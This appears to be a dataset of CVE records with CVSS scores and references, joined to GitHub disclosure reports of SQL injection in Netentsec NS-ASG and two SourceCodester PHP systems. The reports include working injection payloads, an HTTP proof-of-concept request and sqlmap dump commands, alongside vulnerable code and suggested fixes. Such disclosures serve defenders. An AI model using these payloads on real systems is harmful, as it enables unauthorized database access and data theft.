A vulnerability, which was classified as critical, was found in Netentsec NS-ASG Application Security Gateway 6.3. Affected is an unknown function of the file /protocol/firewall/deletemacbind.php. The manipulation of the argument messagecontent leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-267456. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit" ], "url": "https://github.com/L1OudFd8cl09/CVE/issues/3" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.267456" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.267456" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.349551" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/L1OudFd8cl09/CVE/issues/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.267456" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.267456" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.349551" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netentsec:application_security_gateway:6.3:*:*:*:*:*:*:*", "matchCriteriaId": "7A708923-EF5F-4F53-86F3-DF0366E6FB58", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/L1OudFd8cl09/CVE/issues/3
[ "Exploit" ]
github.com
[ "L1OudFd8cl09", "CVE" ]
Beijing Wangkang Technology Co., Ltd. is a leading provider of network application management equipment in China, focusing on the latest trend research and analysis in the field of network application management. It provides users with advanced network application management technology, products, and solutions, aiming to help users achieve the goal of "using the internet well" in network management. There is an SQL injection vulnerability in the Netcom NS-ASG application security gateway. Attackers exploit vulnerabilities to cause harm to servers. official: https://www.netentsec.com/ version:6.3 Vulnerability Path :/protocol/firewall/deletemacbind.php As shown in the figure, the $messageconten value in the packet will accept the value of the $BandIPMacId array variable, which will be carried into the sql statement in the figure below and executed without any restrictions. <img width="519" alt="图片" src="https://github.com/L1OudFd8cl09/CVE/assets/171440363/ff94b63d-5874-4621-905a-f67c80529cb7"> Poc: ``` POST /protocol/index.php HTTP/1.1 Host: 127001:443 Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 123 jsoncontent={"protocolType":"deletemacbind","messagecontent":["444'and(updatexml(1,concat(0x7e,(select+version())),1))='"]} ``` <img width="531" alt="图片" src="https://github.com/L1OudFd8cl09/CVE/assets/171440363/27916905-40b7-4cae-8987-a11f7bb6f07a">
NS-ASG application security gateway. Attackers exploit vulnerabilities
https://api.github.com/repos/L1OudFd8cl09/CVE/issues/3/comments
0
2024-06-04T01:25:59Z
2024-06-10T01:56:59Z
https://github.com/L1OudFd8cl09/CVE/issues/3
2,332,337,521
3
6,057
CVE-2024-5774
2024-06-09T06:15:07.410
A vulnerability has been found in SourceCodester Stock Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file index.php of the component Login. The manipulation of the argument username/password leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-267457 was assigned to this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/CveSecLook/cve/issues/43" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.267457" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.267457" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.352337" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/CveSecLook/cve/issues/43" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.267457" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.267457" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.352337" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:warrendaloyan:stock_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "8F75A0CB-D496-4651-8633-972D8FA69746", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/CveSecLook/cve/issues/43
[ "Exploit", "Issue Tracking" ]
github.com
[ "CveSecLook", "cve" ]
# SourceCodester Stock Management System in PHP 1.0 index.php SQL injection vulnerability # NAME OF AFFECTED PRODUCT(S) + Stock Management System in PHP ## Vendor Homepage + https://www.sourcecodester.com/php/14366/stock-management-system-php.html # AFFECTED AND/OR FIXED VERSION(S) ## submitter + xuanluansec ## Vulnerable File + index.php ## VERSION(S) + V1.0 ## Software Link + https://www.sourcecodester.com/sites/default/files/download/Warren%20Daloyan/stock.zip # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the `index.php` file of the `Stock Management System` project. This issue arises because user inputs `$username` and `$password` from `$_POST['username']` and `$_POST['password']` are directly used in SQL queries without proper sanitization or validation. This allows attackers to craft input values that can manipulate the SQL query and execute unauthorized operations. ## Vulnerability code snippets ```php if($_POST) { $username = $_POST['username']; $password = $_POST['password']; if(empty($username) || empty($password)) { if($username == "") { $errors[] = "Username is required"; } if($password == "") { $errors[] = "Password is required"; } } else { $sql = "SELECT * FROM users WHERE username = '$username'"; $result = $connect->query($sql); if($result->num_rows == 1) { $password = md5($password); // exists $mainSql = "SELECT * FROM users WHERE username = '$username' AND password = '$password'"; $mainResult = $connect->query($mainSql); if($mainResult->num_rows == 1) { $value = $mainResult->fetch_assoc(); $user_id = $value['user_id']; // set session $_SESSION['userId'] = $user_id; header('location: http://localhost/stock/dashboard.php'); } else{ $errors[] = "Incorrect username/password combination"; } // /else } else { $errors[] = "Username doesnot exists"; } // /else } // /else not empty username // password } // /if $_POST ?> ``` + In the above code, the username and password are directly embedded in the SQL query, making them vulnerable to SQL injection attacks ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + During the security review of the "Stock Management System," xuanluansec discovered a critical SQL injection vulnerability in the `index.php` file. This vulnerability stems from inadequate validation of user inputs for the username and password parameters, allowing attackers to inject malicious SQL queries. As a result, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information. Immediate remediation is required to secure the system and protect data integrity. # No login or authorization is required to exploit this vulnerability # Vulnerability details and POC ## Vulnerability type: + MySQL >= 5.0.12 AND time-based blind (query SLEEP) ## Vulnerability location: + 'username' parameter ## Payload: ```sql username=11' AND (SELECT 5107 FROM (SELECT(SLEEP(5)))kTLs) AND 'iIbh'='iIbh&password=11 ``` ```makefile Parameter: username (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: username=11' AND (SELECT 5107 FROM (SELECT(SLEEP(5)))kTLs) AND 'iIbh'='iIbh&password=11 ``` + ![1](https://github.com/CveSecLook/cve/assets/148504790/4261a4f8-03e5-4e49-b4df-9ac45e8f86dc) ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: ```bash python sqlmap.py -u "http://20.20.20.128:8117/index.php" --data="username=11&password=11" --batch --dbms=mysql --level=5 --risk=3 --dump ``` + ![2](https://github.com/CveSecLook/cve/assets/148504790/48848544-3605-4a9f-87c0-d99bc8584136) + ![3](https://github.com/CveSecLook/cve/assets/148504790/ec94d27d-36d7-4220-83b2-9eef48e7ce03) + ![4](https://github.com/CveSecLook/cve/assets/148504790/ed60c3e2-1ba9-4b38-a166-a7ad32550f00) + ![5](https://github.com/CveSecLook/cve/assets/148504790/99aa9334-476e-4739-8a41-3d138696bb8b) + ![6](https://github.com/CveSecLook/cve/assets/148504790/e00be77e-9dff-47d3-a784-1d4c12d3f045) + ![7](https://github.com/CveSecLook/cve/assets/148504790/3864d896-639a-4b63-af5f-79467ee4c6b5) + ![8](https://github.com/CveSecLook/cve/assets/148504790/52f4601a-a3c0-454b-8c7b-3fda9191c93f) + ![9](https://github.com/CveSecLook/cve/assets/148504790/9a8e96bc-daf7-483c-a4b8-033f3b4d390f) + ![10](https://github.com/CveSecLook/cve/assets/148504790/eb06e7f3-1d67-46c4-abf7-2259b88e911f) # Suggested repair 1. **Use preprocessed statements and parameter binding**: Prevent SQL injection by using preprocessed statements and parameterized queries. For example, using PDO or MySQL extensions. 2. **Verify and Filter User Input**: Verify and filter all user inputs to ensure that the format and type of input data meet expectations. 3. **Secure Password Storage**: Use a more secure hash algorithm to store passwords, such as the password_hash function, instead of using simple MD5 or SHA1. ## Example code fix: ```php if ($_POST) { $username = $_POST['username']; $password = $_POST['password']; if (empty($username) || empty($password)) { if ($username == "") { $errors[] = "Username is required"; } if ($password == "") { $errors[] = "Password is required"; } } else { // 使用预处理语句防止SQL注入 $stmt = $connect->prepare("SELECT * FROM users WHERE username = ?"); $stmt->bind_param("s", $username); $stmt->execute(); $result = $stmt->get_result(); if ($result->num_rows == 1) { $password = md5($password); // exists $stmt = $connect->prepare("SELECT * FROM users WHERE username = ? AND password = ?"); $stmt->bind_param("ss", $username, $password); $stmt->execute(); $mainResult = $stmt->get_result(); if ($mainResult->num_rows == 1) { $value = $mainResult->fetch_assoc(); $user_id = $value['user_id']; // set session $_SESSION['userId'] = $user_id; } } } } ```
SourceCodester Stock Management System in PHP 1.0 index.php SQL injection vulnerability
https://api.github.com/repos/CveSecLook/cve/issues/43/comments
0
2024-06-08T04:24:31Z
2024-06-08T04:24:31Z
https://github.com/CveSecLook/cve/issues/43
2,341,450,040
43
6,058
CVE-2024-5775
2024-06-09T08:15:23.373
A vulnerability was found in SourceCodester Vehicle Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file updatebill.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-267458 is the identifier assigned to this vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/CveSecLook/cve/issues/44" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.267458" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.267458" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.352338" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/CveSecLook/cve/issues/44" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.267458" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.267458" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.352338" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:warrendaloyan:vehicle_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "02A258DE-6115-4843-AC16-CA63EBAB3142", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/CveSecLook/cve/issues/44
[ "Exploit", "Issue Tracking" ]
github.com
[ "CveSecLook", "cve" ]
# SourceCodester Vehicle Management System in PHP/MySQL 1.0 updatebill.php SQL injection # NAME OF AFFECTED PRODUCT(S) + Vehicle Management System in PHP/MySQL ## Vendor Homepage + https://www.sourcecodester.com/php/14404/vehicle-management-system-phpmysql.html # AFFECTED AND/OR FIXED VERSION(S) ## submitter + xuanluansec ## Vulnerable File + updatebill.php ## VERSION(S) + V1.0 ## Software Link + https://www.sourcecodester.com/sites/default/files/download/Warren%20Daloyan/bus_vehicle_management.zip # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'updatebill.php' file of the 'Vehicle Management System in PHP/MySQL' project. The reason for this issue is that attackers inject malicious code from the parameter "id" and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + During the security review of the "Vehicle Management System in PHP/MySQL" xuanluansec discovered a critical SQL injection vulnerability in the `updatebill.php` file. This vulnerability stems from inadequate validation of user inputs for the email and password parameters, allowing attackers to inject malicious SQL queries. As a result, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information. Immediate remediation is required to secure the system and protect data integrity. # No login or authorization is required to exploit this vulnerability # Vulnerability details and POC ## Vulnerability type: + boolean-based blind + time-based blind ## Vulnerability location: + 'id' parameter ## Payload: ```sql id=1' AND 6722=(SELECT (CASE WHEN (6722=6722) THEN 6722 ELSE (SELECT 3580 UNION SELECT 3808) END))-- -&salary=1&equipment=1&oil=1&tcost=1 id=1' AND (SELECT 4159 FROM (SELECT(SLEEP(5)))bSHe)-- zHWk&salary=1&equipment=1&oil=1&tcost=1 ``` ```makefile Parameter: id (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: id=1' AND 6722=(SELECT (CASE WHEN (6722=6722) THEN 6722 ELSE (SELECT 3580 UNION SELECT 3808) END))-- -&salary=1&equipment=1&oil=1&tcost=1 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1' AND (SELECT 4159 FROM (SELECT(SLEEP(5)))bSHe)-- zHWk&salary=1&equipment=1&oil=1&tcost=1 ``` + ![1](https://github.com/CveSecLook/cve/assets/148504790/b69b42d2-3947-4f4c-922d-5e97236a8cea) ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: ```bash python sqlmap.py -u "http://20.20.20.128:8118/updatebill.php" --data="id=1&salary=1&equipment=1&oil=1&tcost=1" --method=POST --dbms=mysql --level=5 --risk=3 --batch --dbs ``` + ![2](https://github.com/CveSecLook/cve/assets/148504790/c64330e4-d19b-4656-85cd-33b9d2989cb4) # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
SourceCodester Vehicle Management System in PHP/MySQL 1.0 updatebill.php SQL injection
https://api.github.com/repos/CveSecLook/cve/issues/44/comments
0
2024-06-08T04:29:27Z
2024-06-08T04:29:27Z
https://github.com/CveSecLook/cve/issues/44
2,341,453,168
44
6,059
CVE-2024-37568
2024-06-09T19:15:52.323
lepture Authlib before 1.3.1 has algorithm confusion with asymmetric public keys. Unless an algorithm is specified in a jwt.decode call, HMAC verification is allowed with any asymmetric public key. (This is similar to CVE-2022-29217 and CVE-2024-33663.)
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/lepture/authlib/issues/654" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FHJI32SN4FNAUVNALVGOKWHNSQ6XS3M5/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IZI7HYGN7VZAYFV6UV3SRLYF7QGERXIU/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.vicarius.io/vsociety/posts/algorithm-confusion-in-lepture-authlib-cve-2024-37568" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/lepture/authlib/issues/654" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FHJI32SN4FNAUVNALVGOKWHNSQ6XS3M5/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IZI7HYGN7VZAYFV6UV3SRLYF7QGERXIU/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.vicarius.io/vsociety/posts/algorithm-confusion-in-lepture-authlib-cve-2024-37568" } ]
